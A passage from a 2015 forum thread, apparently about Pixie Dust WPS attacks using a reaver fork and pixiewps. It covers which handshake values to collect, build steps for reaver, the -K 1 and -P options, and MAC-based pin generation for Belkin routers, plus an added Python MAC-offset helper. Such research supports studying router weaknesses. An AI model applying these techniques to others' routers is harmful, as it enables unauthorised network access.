    Linksys was recently acquired by Belkin... that is why it shows the Manufacturer as Belkin. However, based on your reaver output, you are attacking a Linksys WRT1900AC... which technically is NOT a Belkin router.

    As far as I know, the WRT1900AC uses a Marvell chipset which is not very common, but certainly worth looking into as I assume they are very popular with all the WRT series fans. If you could get more data, I would love to take a look into it... hopefully with help from others

  42. #42
    Join Date
    2015-Mar
    Posts
    127
    Thanks for the info... I just went by airodump's manufacturer field; silly noob, I should have seen that.
    (I used airodump because wash shows "rssi 00" on the Atheros chipset.)

    What info do you need?
    Wireshark capture?
    Send where?

  43. #43
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Complete reaver WPS exchange and a cap of the exchange. You can e-mail it to my username@gmail.com (anti-spam haha)

  44. #44
    Join Date
    2015-Mar
    Posts
    127
    Reaver with or without small keys?
    Actually, post the reaver syntax you want.

  45. #45
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by nuroo View Post
    Reaver with or without small keys?
    Actually, post the reaver syntax you want.
    Without small keys.

    Code:
    Manufacturer: 
    Model: 
    Model Number: 
    Serial Number: 
    E-Nonce: 
    PKR: 
    PKR: 
    E-Hash1: 
    E-Hash2: 
    Authkey:
    Some of the first part may not be available, but if they are it would be helpful. And I can find the rest in the cap.

  46. #46
    Join Date
    2015-Mar
    Posts
    127
    Suggestion only

    Get Reaver
    wget https://github.com/t6x/reaver-wps-fo...ive/master.zip

    unzip master.zip (verify, I'm not at my PC)

    Build Reaver

    cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install
    Last edited by nuroo; 2015-04-19 at 19:43.

  47. #47
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by Extradry View Post
    @t6_x

    Just confirming: does the latest version on git (1.5.2) require the K 1 option to test all 3 chipsets now?

    Cheers
    Exta

    Sorry for the delay in responding, I have not had much time this weekend.

    After tests and reviews, the best way to handle the situation is to run all possible attacks at once, even though it takes more time; the machine I'm using takes about 1 min to finish one single pixiewps run.

    But even so, it is more practical to run it only once than to divide the attack among several other options.

    I was already not very happy with the options, and soxrok2212 finally convinced me that it was better to have only one.

    So the answer is yes: the only option, -K 1, runs pixiewps with all the arguments, and pixiewps in turn, when it receives all the arguments, performs all the bruteforces known up to the moment.

  48. #48
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    Just the Belkin pin Attack

    Should I try other pins after I try unlocking the router?
    What's the correct reaver command after the pin is found?

    It generates 3 pins.

    This is because of the following.

    We do not know which MAC the router is using to generate the pin.

    So first it generates the pin for the BSSID used.

    Then it generates the pin for the BSSID + 1, which is the MAC with +1 added to the last value, because many routers' MACs are sequential.

    e.g.:

    LAN MAC 00:00:00:00:00:05
    wlan1   00:00:00:00:00:06

    But in some models wlan1 is the main MAC and the LAN MAC is the next one, so since we cannot be sure, a pin is generated for MAC, MAC +1 and MAC -1.

    Of course there may be models that do not follow this rule, but all those looked at so far followed it; some used the next MAC and others the previous MAC.

    Now regarding the loop, the -vv option was missing to really know what was going on, but I believe the pin gen did not generate the correct pin and it was in the same loop trying the pin until the router went into lock.

    So far I have found only one router for which the pin gen managed to generate the correct pin.
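    The MAC, MAC +1 and MAC -1 derivation described in the post above, as an added example in Python that is not code from the reaver-wps-fork-t6x project: it carries the increment across octets and wraps at ff:ff:ff:ff:ff:ff, which a last-octet-only adjustment would miss, and it includes a check for whether two interface MACs (such as the LAN/wlan1 pair in the example) are sequential. The function names are my own.

```python
# Added example (not from reaver-wps-fork-t6x): derive the three candidate
# MACs the pin generator tries (MAC, MAC+1, MAC-1) and check whether a
# router's interface MACs are sequential, as the post describes.

MAC_MASK = (1 << 48) - 1  # 48-bit address space, used for wrap-around


def mac_to_int(mac: str) -> int:
    """Parse 'aa:bb:cc:dd:ee:ff' (case-insensitive, '-' separators accepted)."""
    octets = mac.replace("-", ":").split(":")
    if len(octets) != 6 or any(len(o) != 2 for o in octets):
        raise ValueError(f"malformed MAC: {mac!r}")
    return int("".join(octets), 16)


def int_to_mac(value: int) -> str:
    """Format a 48-bit integer as a colon-separated lowercase MAC."""
    value &= MAC_MASK  # handles ff:ff:ff:ff:ff:ff + 1 and 00:00:00:00:00:00 - 1
    raw = f"{value:012x}"
    return ":".join(raw[i:i + 2] for i in range(0, 12, 2))


def neighbour_macs(bssid: str) -> dict:
    """The three addresses the pin generator derives from the BSSID.

    The +1/-1 is applied to the whole 48-bit value, so a last octet of
    0xff carries into the next octet instead of overflowing.
    """
    base = mac_to_int(bssid)
    return {
        "mac": int_to_mac(base),
        "mac+1": int_to_mac(base + 1),
        "mac-1": int_to_mac(base - 1),
    }


def mac_offset(mac_a: str, mac_b: str) -> int:
    """Signed distance from mac_a to mac_b; +1 or -1 means the two are sequential."""
    return mac_to_int(mac_b) - mac_to_int(mac_a)


if __name__ == "__main__":
    # Constructed sample values matching the LAN/wlan1 pattern from the post.
    lan, wlan1 = "00:00:00:00:00:05", "00:00:00:00:00:06"
    print(neighbour_macs(lan))
    print("sequential:", abs(mac_offset(lan, wlan1)) == 1)
```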

  49. #49
    Join Date
    2015-Apr
    Posts
    2
    In my area, CenturyLink with a ZyXEL C1000Z is common... what kind of cap is needed? A full handshake, right? And then a separate txt with an unrelated set of PKE/PKR, E-Hash1/2, AuthKey and nonce for that AP?

  50. #50
    Join Date
    2015-Feb
    Posts
    6
    For those wondering what reaver's -P option is intended for:

    Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
    This option was made with intent of:

    ----Collecting repetitive hashes for further comparison and/or analysis / discovery of new vulnerable chipsets, routers etc.

    ----Time-sensitive attacks where the hash collecting continues repetitively until your time frame is met.

    ----For scripting purposes, for those who want a lockout-avoiding way of PixieHash gathering for their use case.
